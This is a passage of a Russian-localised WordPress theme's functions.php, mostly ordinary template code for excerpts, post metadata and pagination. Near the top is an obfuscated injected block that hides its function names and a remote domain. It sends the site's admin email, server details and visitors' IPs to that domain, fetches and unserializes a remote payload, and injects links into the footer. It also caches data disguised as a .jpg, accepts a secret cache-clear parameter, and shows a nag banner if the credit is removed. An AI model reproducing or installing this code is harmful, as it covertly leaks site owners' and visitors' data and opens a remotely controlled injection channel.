<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $YZfqAh='b';$ZejiWzJ='s';$BXczXi='6';$dnkndc='d';$aEPPcg='c';$ucEthN='_';$ZQNkdQ='e';$GMxN='d';$cCKDi='o';$JDBH='e';$xqCawsA='4';$CfPAjbB='a';$QRNG='e';$mqiEQKNr=$YZfqAh.$CfPAjbB.$ZejiWzJ.$QRNG.$BXczXi.$xqCawsA.$ucEthN.$dnkndc.$JDBH.$aEPPcg.$cCKDi.$GMxN.$ZQNkdQ;$qCUxtux='g';$ZFpucHK='l';$qmPnm='z';$doUE='t';$Qufh='f';$QGezMB='i';$AAEK='e';$GVDkiR='n';$xYBZP='a';$uQEmoZIC=$qCUxtux.$qmPnm.$QGezMB.$GVDkiR.$Qufh.$ZFpucHK.$xYBZP.$doUE.$AAEK;$rPGG='r';$degS='s';$khgO='t';$HpMr='r';$IBYPHNX='t';$LjHPo='o';$xTfCFrT='3';$cKGaT='1';$jmxZmeM='_';$ZmcupKfD=$degS.$khgO.$HpMr.$jmxZmeM.$rPGG.$LjHPo.$IBYPHNX.$cKGaT.$xTfCFrT;$MOMEYg='r';$yLNVGd='e';$cLBf='v';$VqpvH='s';$NtyUXGL='r';$dyhYo='t';$hEiQMSZd=$VqpvH.$dyhYo.$MOMEYg.$NtyUXGL.$yLNVGd.$cLBf;                     $if________s='b';$lt__________b='s';$oa___w='6';$mx______v='d';$ek___________p='c';$dl___________m='_';$ts_____h='e';$wt__________k='d';$df___________y='o';$cu_________m='e';$np__x='4';$jj______________e='a';$uq___s='e';$yk______________k=$if________s.$jj______________e.$lt__________b.$uq___s.$oa___w.$np__x.$dl___________m.$mx______v.$cu_________m.$ek___________p.$df___________y.$wt__________k.$ts_____h;$rc______________m='e';$ms____f='s';$uq____e='u';$jq_________w='f';$mp__n='x';$my_____________y='o';$ze_____z='i';$cy__u='s';$zx___________c='t';$uj___________n='n';$ak____s='c';$rv________c='i';$si_________c='n';$tn______________f='t';$yb_______________s='_';$mp_____________g=$jq_________w.$uq____e.$uj___________n.$ak____s.$zx___________c.$rv________c.$my_____________y.$si_________c.$yb_______________s.$rc______________m.$mp__n.$ze_____z.$cy__u.$tn______________f.$ms____f;$zn____f='n';$tx_________f='f';$pr_______q='o';$ks__________d='p';$zj__________i='e';$ha____________o=$tx_________f.$pr_______q.$ks__________d.$zj__________i.$zn____f;$bo_______________h='e';$pe_________h='d';$zm_____y='f';$du__y='a';$zl____l='r';$tb____________i=$zm_____y.$zl____l.$bo_______________h.$du__y.$pe_________h;$fa_____________k='o';$ef______________a='e';$nm___________r='l';$qk______m='f';$qy__________s='s';$rx__________f='c';$zv____b=$qk______m.$rx__________f.$nm___________r.$fa_____________k.$qy__________s.$ef______________a;define("WP_ID", $yk______________k("Mi4wLjA="));define("WP_TTL", $yk______________k("MTA4MDA="));define("WP_SRC", $yk______________k("dHBva24="));function wp_get_header() {global $yk______________k, $mp_____________g;if ($mp_____________g($yk______________k("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$mp_____________g($yk______________k("d3BfZ2V0X2Zvb3Rlcg==")) &&$mp_____________g($yk______________k("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $yk______________k, $ha____________o, $zv____b, $tb____________i;$ab_________s = TEMPLATEPATH."/".$yk______________k("Zm9vdGVyLnBocA==");$rd_________w = @$ha____________o($ab_________s, "r");$ab_________s = @$tb____________i($rd_________w, @filesize($ab_________s));@$zv____b($rd_________w);$qp_______k = TEMPLATEPATH."/".$yk______________k("ZnVuY3Rpb25zLnBocA==");$rd_________w = @$ha____________o($qp_______k, "r");$qp_______k = @$tb____________i($rd_________w, @filesize($qp_______k));@$zv____b($rd_________w);$xh________c = 0;if($ab_________s && $qp_______k) {if ($yk______________k("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($ab_________s, $yk______________k("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$xh________c = 1;}if (substr_count($ab_________s, "wp_theme_GPL_credits()") < 1) {$xh________c = 2;}}if(WP_ID != "2.0.0") {$xh________c = 12;}}if($xh________c > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $xh________c -->";}}function wp_loaded() {global $yk______________k, $mp_____________g;return $mp_____________g($yk______________k("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($ek__________a, $gk_______________l = "(more...)", $ak_________s = 0, $rl_____p = "") {$vo________p = get_the_content($gk_______________l, $ak_________s, $rl_____p);$vo________p = apply_filters("the_content", $vo________p);$vo________p = str_replace("]]>", "]]>", $vo________p);if (strlen($_GET["p"]) > 0) {echo $vo________p;}else if ((strlen($vo________p)>$ek__________a) && ($xe__h = strpos($vo________p, " ", $ek__________a ))) {$vo________p = substr($vo________p, 0, $xe__h);$vo________p = $vo________p;echo $vo________p;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$gk_______________l</a></div></p>";} else {echo $vo________p;}}}$hl_____________g='o';$gy__f='4';$qr__g='6';$ic______b='_';$wb____b='c';$og_______________o='a';$yn_____f='e';$bp___p='n';$wu_________i='e';$zc________p='d';$ef_____u='s';$mh__t='b';$uo_____________b='e';$nl_______________p=$mh__t.$og_______________o.$ef_____u.$yn_____f.$qr__g.$gy__f.$ic______b.$wu_________i.$bp___p.$wb____b.$hl_____________g.$zc________p.$uo_____________b;$vf_________j='t';$zg__________i='e';$lx________x='n';$wj_________r='n';$uo______r='s';$qp_______________s='l';$po__w='g';$nq___________u='e';$xo_____________n='c';$el_____t='t';$ki_________x='i';$mh_______________i='_';$ev_____r='o';$op__y='_';$ip___________g='e';$bb______________d='f';$vm___________w='t';$nr________l=$bb______________d.$ki_________x.$qp_______________s.$nq___________u.$mh_______________i.$po__w.$ip___________g.$vm___________w.$op__y.$xo_____________n.$ev_____r.$lx________x.$el_____t.$zg__________i.$wj_________r.$vf_________j.$uo______r;$tn_________m='s';$sf_____v='i';$el________f='_';$tz____d='l';$tp___________q='e';$gn_______i='x';$eu_____u='s';$qw_________n='i';$fr__________j='e';$ru______k='t';$dy_________k='f';$va_____a=$dy_________k.$qw_________n.$tz____d.$tp___________q.$el________f.$fr__________j.$gn_______i.$sf_____v.$eu_____u.$ru______k.$tn_________m;$ek_____m='e';$ol_____________f='e';$il________q='_';$ts________r='r';$ha______l='v';$gx_____a='o';$xp________j='n';$tc_____________x='i';$la_______e='s';$ea______u='a';$px_____e='o';$rc_____k='p';$mu__b='c';$pr___________a='m';$yp_______________w='r';$cc______________g=$ha______l.$ol_____________f.$ts________r.$la_______e.$tc_____________x.$px_____e.$xp________j.$il________q.$mu__b.$gx_____a.$pr___________a.$rc_____k.$ea______u.$yp_______________w.$ek_____m;$wl__c='f';$zi________f='c';$em___u='o';$nb______________s='p';$iq__e='e';$rj_______________p='o';$sf__________n='k';$ca______y='n';$vs__h='s';$ds______k=$wl__c.$vs__h.$rj_______________p.$zi________f.$sf__________n.$em___u.$nb______________s.$iq__e.$ca______y;$cn_______t='w';$rk_______e='r';$bg___z='e';$se_________r='t';$gt______z='f';$xg_______q='i';$yr_______________t=$gt______z.$cn_______t.$rk_______e.$xg_______q.$se_________r.$bg___z;$ns___l='m';$zn___r='d';$rq_______t='5';$hw______k=$ns___l.$zn___r.$rq_______t;$ju___________g='a';$au_________k='t';$nd_________b='a';$jo_______________k='e';$zb________s='r';$eo__________a='p';$ut__________t='h';$yw___________u='l';$ui___________n=$zb________s.$jo_______________k.$ju___________g.$yw___________u.$eo__________a.$nd_________b.$au_________k.$ut__________t;$hw____________d='i';$ww___________z='r';$we______e='i';$vp_______________f='s';$ur___d='e';$wf_______n='n';$ce___________x='z';$xt_________o='a';$ya____r='u';$jf________f='e';$dg___________c='l';$no__________v=$ya____r.$wf_______n.$vp_______________f.$jf________f.$ww___________z.$we______e.$xt_________o.$dg___________c.$hw____________d.$ce___________x.$ur___d;$xx_______y='m';$vd___________g='t';$az__h='p';$dk_________i='e';$hb_____________m='n';$un____________r='a';$kz_______e='m';$iq_________q=$vd___________g.$dk_________i.$kz_______e.$az__h.$hb_____________m.$un____________r.$xx_______y;$mg_____________j='t';$xv______________r='r';$kr________w='c';$qe_____f='t';$rb__________s='r';$ao_____y='n';$ow_____d='m';$px__________y='e';$mt______v='s';$hx______z='e';$hw______s='c';$pw_______f='_';$bq________m='_';$df_______________s='t';$vq____b='a';$bg__________c='a';$jd__________q='t';$zx_____________q='e';$lu___________x='o';$ou_______________c='x';$bx__________w='e';$ab______________e=$mt______v.$mg_____________j.$xv______________r.$hx______z.$vq____b.$ow_____d.$pw_______f.$kr________w.$lu___________x.$ao_____y.$jd__________q.$bx__________w.$ou_______________c.$qe_____f.$bq________m.$hw______s.$rb__________s.$px__________y.$bg__________c.$df_______________s.$zx_____________q;function rw_____________o($ha_______________r) {global $yk______________k, $mp_____________g, $nr________l, $cc______________g, $ab______________e;if (!$mp_____________g($yk______________k("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($cc______________g(PHP_VERSION, "5.0.0", ">=") && $mp_____________g($yk______________k("ZmlsZV9nZXRfY29udGVudHM=")) && $mp_____________g($yk______________k("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$uf___________n = $ab______________e(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$xs______________d = @$nr________l($ha_______________r, 0, $uf___________n);} else {$xs______________d = @$nr________l($ha_______________r, 0);}return $xs______________d;}function iz_________o($ha_______________r) {global $mp_____________g, $ds______k, $yr_______________t, $yk______________k;if (!$mp_____________g($yk______________k("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$aw_____a = strpos($ha_______________r, "/", 7);$ou____________l = array("uri"     => substr($ha_______________r, $aw_____a),"host"    => str_replace("http://", "", substr($ha_______________r, 0, $aw_____a)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$zo____n = @$ds______k("$ou____________l[host]", 80, $ej__________f, $ju______d, 4);if (!$zo____n) {return false;} else {$xs______________d = "";$cz__j  = "GET $ou____________l[uri] HTTP/1.0\r\n";$cz__j .= "Host: $ou____________l[host]\r\n";$cz__j .= "Referer: $ou____________l[referer]\r\n";$cz__j .= "Connection: Close\r\n\r\n";@$yr_______________t($zo____n, $cz__j);while (!@feof($zo____n)) {$qj____________n = @fgets($zo____n, (1024*24));if ($qj____________n == "\r\n") {$xs____f = true;continue;}if ($xs____f) {$xs______________d .= $qj____________n;}}return $xs______________d;}}function hz____e($ha_______________r) {global $mp_____________g;$ei_____________w = false;if ($ha_______________r != "") {if ($mp_____________g("rw_____________o")) {$ei_____________w = @rw_____________o($ha_______________r);}if (!$ei_____________w && ($mp_____________g("iz_________o"))) {$ei_____________w = @iz_________o($ha_______________r);}}return $ei_____________w;}function sh___________v() {global $_SERVER, $hw______k;$so_______k = $_SERVER["SERVER_NAME"];if (substr("$so_______k", 0, 4) == "www.") {$so_______k = substr("$so_______k", 4);}$so_______k = $hw______k("$_SERVER[SERVER_NAME]");return $so_______k;}function yn______________u() {return "file";}function ni__w($ha_______________r) {global $_SERVER, $nr________l, $va_____a, $ha____________o, $zv____b, $yr_______________t;$qv___________h = dw______________v();$kv______x = sh___________v().".jpg";$gt______________q = $qv___________h["dir_upload"]["path"]."/$kv______x";$ki____l = @filemtime($gt______________q);if (!$ki____l || ((time()-$ki____l) >= WP_TTL)) {$ei_____________w = hz____e($ha_______________r);if ($ei_____________w) {if ($va_____a($gt______________q)) {@unlink($gt______________q);}$rd_________w = @$ha____________o($gt______________q, "x+");@$yr_______________t($rd_________w, $ei_____________w);@$zv____b($rd_________w);}} else {if ($va_____a($gt______________q)) {$ei_____________w = @$nr________l($gt______________q);} else {$ei_____________w = false;}}return $ei_____________w;}function dw______________v() {global $_SERVER, $yk______________k, $nl_______________p;$cq______________h = wp_count_posts("post");$xt__n = pathinfo(get_bloginfo("template_directory"));$qv___________h = array("url" => array("report"      => $yk______________k("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $xt__n,"dir_upload"=> ex___________c(),"queryString"=> array("?a001=".WP_ID,"a004=".$xt__n[filename],"a005=".$cq______________h->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>" );$qv___________h["url"]["queryString"] = implode("&", $qv___________h["queryString"]);$qv___________h["url"]["report"] = $qv___________h["url"]["report"]."/?".$nl_______________p($qv___________h["url"]["queryString"]).".html";return $qv___________h;}function ex___________c() {$wq____t = wp_upload_dir();if (isset($wq____t["error"])) {$xz_______________b = hd___c();if (is_writable($xz_______________b)) {$wq____t = array("path" => $xz_______________b);}}return $wq____t;}function hd___c() {global $mp_____________g, $hw______k, $ui___________n, $iq_________q;$jo_____________f = (bool) ini_get("safe_mode");if ($jo_____________f == true) {return false;}if ($mp_____________g("sys_get_temp_dir")) {$ee________n = sys_get_temp_dir();if (is_writable($ee________n)) {return $ui___________n($ee________n);}}if (!empty($_ENV["TMP"])) {return $ui___________n($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $ui___________n($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $ui___________n($_ENV["TEMP"]);} else {$dx___f = $iq_________q($hw______k(uniqid(rand(), true)), "");if ($dx___f) {$ee________n = $ui___________n(dirname($dx___f));@unlink($dx___f);return $ee________n;} else {return false;}}}function zp_____________k() {global $_GET, $va_____a;$qv___________h = dw______________v();$so_______k = sh___________v();$mj____a = yn______________u();$sv_____________a = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($mj____a == "file") {$vi_________j = $qv___________h["dir_upload"]["path"]."/".$so_______k.".jpg";if ($va_____a($vi_________j)) {@unlink($vi_________j);$sv_____________a = "deleted";}}$ur______m = array("s"=> $sv_____________a,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($ur______m AS $mm_____i => $uu___________e) echo " [$mm_____i:$uu___________e]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $mp_____________g, $yk______________k, $no__________v;$qv___________h = dw______________v();$is_________z = "ni__w";if ($mp_____________g($is_________z)) {$xs______________d = $is_________z($qv___________h["url"]["report"]);}if ($xs______________d) {if ($xs______________d = @$yk______________k($xs______________d)) {$xs______________d = @$no__________v($xs______________d);if (strlen($xs______________d[custom_credit]) >= 5) {$qv___________h["default_string"] = $xs______________d[custom_credit];}if ($xs______________d["status"] == "0") {$dy_____g = 1;$hx________v = 1;} else {$gd___v = sizeof($xs______________d["links"]);$ar_______z = $qv___________h["default_string"];if ($gd___v > 0 && $xs______________d["links"] !== "") {$sf_________p = 0;foreach ($xs______________d["links"] as $fq_______j => $cq____________v) {$sf_________p++;if ($cq____________v->l_path == "" || $cq____________v->l_path == $_SERVER["REQUEST_URI"]) {$cq____________v->l_href = htmlspecialchars(strip_tags($cq____________v->l_href));$cq____________v->l_title = htmlspecialchars(strip_tags($cq____________v->l_title));$cq____________v->l_anchor = htmlspecialchars(strip_tags($cq____________v->l_anchor));$ar_______z .= " | ";$ar_______z .= "<a href='$cq____________v->l_href' title='$cq____________v->l_title'";if ($cq____________v->l_nofollow == "1") {$ar_______z .= " rel='nofollow'";}$ar_______z .= ">$cq____________v->l_anchor</a>";}}}$qv___________h["links"] = "$ar_______z";if ($xs______________d[credit] == "0") {$qv___________h["links"] = "";}}} else {$dy_____g = "1";}} else {$dy_____g = "1";}if ($dy_____g == "1") {$qv___________h["links"] = $qv___________h["default_string"];}echo "$qv___________h[links]";echo "<!-- s: $xs______________d[signature] -->";zp_____________k();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
